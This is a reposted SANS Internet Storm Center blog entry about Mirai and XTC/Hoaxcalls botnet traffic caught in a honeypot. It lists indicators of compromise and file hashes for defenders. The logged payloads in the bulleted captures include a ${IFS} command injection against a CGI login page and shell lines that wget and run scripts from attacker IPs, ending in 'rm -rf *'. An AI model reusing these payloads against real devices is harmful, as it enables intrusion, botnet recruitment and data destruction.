Blog

Archive for June 13th, 2020

Mirai Botnet Activity, (Sat, Jun 13th)

This past week, I noticed new activity from the Mirai botnet in my honeypot. The sample log with the IP and file associated with the first log appears to have been taken down (96.30.193.26) which appeared multiple times this week including today. However, the last two logs from today are still active which is using a Bash script to download multiple exploits targeting various device types (MIPS, ARM4-7, MPSL, x86, PPC, M68k). Something else of interest is the User-Agent: XTC and the name viktor which appear to be linked to XTC IRC Botnet, aka Hoaxcalls.

  • 20200613-025717: 192.168.25.9:80-115.85.32.210:55065 data ‘POST /cgi-bin/mainfunction.cgi HTTP/1.1rnUser-Agent: XTCrnHost: 127.0.0.1rnContent-Length: 189rnAccept-Encoding: gzip, deflaternAccept-Language: en-US,en;q=0.9rnrnaction=login&keyPath=’wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor’&loginUser=a&loginPwd=arnrn’
  • 20200613-101614: 192.168.25.9:8088-36.82.97.160:41885 data ‘cd /tmp; wget http://185.172.111.214/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *rnrn’
  • 20200613-101617: 192.168.25.9:8088-36.82.97.160:33090 data ‘cd /tmp; wget http://185.172.111.214/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *rnrn’

Indicators of Compromise

  • http://96.30.193[.]26/arm7
  • http://185.172.111[.]214/8UsA[.]sh
  • User-Agent: XTC

Suspisious Files and Scripts:

  • UnHAnaAW.sh4 – 5d646c4f5d1793a6070bb03b069f263529b4bc470ab4d5960ae55a211eb9b2f1
  • 8UsA.sh – 590d00e051703e55be2ad10fa94eadc499262bf8a62190a648a7a2756fd31862

[1] https://www.virustotal.com/gui/file/5d646c4f5d1793a6070bb03b069f263529b4bc470ab4d5960ae55a211eb9b2f1/detection
[2] https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/
[3] https://blog.radware.com/security/botnets/2020/05/whos-viktor-tracking-down-the-xtc-polaris-botnets/
[4] https://isc.sans.edu/ipinfo.html?ip=115.85.32.210
[5] https://isc.sans.edu/ipinfo.html?ip=185.172.111.214
[6] https://isc.sans.edu/ipinfo.html?ip=96.30.193.26
[7] https://isc.sans.edu/ipinfo.html?ip=36.82.97.160

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →